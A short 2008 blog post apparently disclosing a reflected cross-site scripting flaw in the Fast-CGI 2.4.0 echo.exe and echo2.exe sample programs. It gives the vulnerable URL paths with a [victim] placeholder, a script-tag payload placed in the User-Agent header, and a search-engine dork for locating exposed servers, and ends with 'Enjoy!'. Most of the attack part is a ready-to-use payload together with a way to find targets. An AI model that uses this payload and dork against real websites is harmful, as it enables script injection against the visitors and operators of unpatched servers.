Sunday, September 14, 2008

Fast-Cgi <=2.4.0 echo.exe/echo2.exe XSS

This is a XSS bug, that i found in fast-cgi 2.4.0 echo/echo2 applications.
This happens because, there isn't a data validation, when the application is printing the data.

Exploit:

##################################################
Fast-Cgi <=2.4.0 echo.exe/echo2.exe XSS
##################################################

echo.exe : http://[victim]/fcgi-bin/echo.exe
echo2.exe : http://[victim]/fcgi-bin/echo2.exe

Change the User-Agent to:

User-Agent: [XSS]

ex:

User-Agent: <script>alert("XSS");</script>

Dork: inurl:/fcgi-bin/echo
##################################################
by Juza, iamjuza [at] gmail.com
##################################################

Enjoy!
Publicada por em

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)